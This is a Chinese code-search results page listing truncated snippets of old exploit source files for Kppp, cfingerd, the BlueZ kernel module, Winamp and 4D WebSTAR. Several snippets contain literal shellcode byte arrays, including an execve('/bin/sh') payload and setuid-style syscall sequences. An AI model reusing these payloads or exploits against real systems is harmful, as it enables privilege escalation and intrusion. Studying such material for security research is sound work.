代码搜索:Shellcode
找到约 263 项符合「Shellcode」的源代码
代码结果 263
www.eeworm.com/read/101671/15822383
c kppp.c
/*
* exploit.c Linux/Intel Kppp 1.1.2 and below
* Re-Copyright (C) 2001 Doom
*
www.eeworm.com/read/101671/15822418
pl cfingerd-exploit.pl
#!/usr/bin/perl
# | Local buffer overflow exploit for cfingerd
# | Copyright (c) 2001 by
# | All rights reserved.
# |
# | Simple exploit for the vulnerability reported
# | to
www.eeworm.com/read/422212/10655248
cpp test.cpp
#include
#include
char shellcode[] =
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x41\x41\x41\x41"
"\x12\x45\xfa\x7f"
"\x55\x8b\xec\x33\xc0\x50\x50\x50\xc6\x45\xf4\x4d\x
www.eeworm.com/read/159132/10692382
c testsc2.c
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
voi
www.eeworm.com/read/159132/10692394
c test.c
char shellcode[] =
"\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69"
"\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80";
int main()
{
__asm__("call shellcode");
}
www.eeworm.com/read/159132/10692414
c stackexploit3.c
#include
char shellcode[]=
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x2e"
"\xcd\x80"
www.eeworm.com/read/159132/10692423
c stackexploit2.c
#include
#include
#include
char shellcode[]=
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb"
"\x89\xd8"
"\xb0\x17"
"\xcd\x80"
"\x31\xdb
www.eeworm.com/read/439530/7119144
txt linux kernel 2.4 2.6 bluez local root privilege escalation exploit (update).txt
/*
Due to many responses i've improved the exploit
to cover more systems!
ONG_BAK v0.9 [october 24th 05]
""""""""""""""""""""""""""""""""""""
o universal "shellcode" added
o try to use
www.eeworm.com/read/253602/12210202
txt winampm3u_c.txt
/*
Credits go to the author
How to fix and study the bug:
* - The cdda library only reserves 20 bytes for names when files are "*.cda"
* - run Winamp with ollye
* - when loaded locate and
www.eeworm.com/read/253602/12210232
txt 4d webstar tomcat plugin remote buffer overflow exploit.txt
/* 4d buffer overflow
Braden Thomas
the buffer is copied byte by byte starting from the beginning of
the buffer
until a NULL byte is reached (or a couple other types of bytes)
the buffer is cop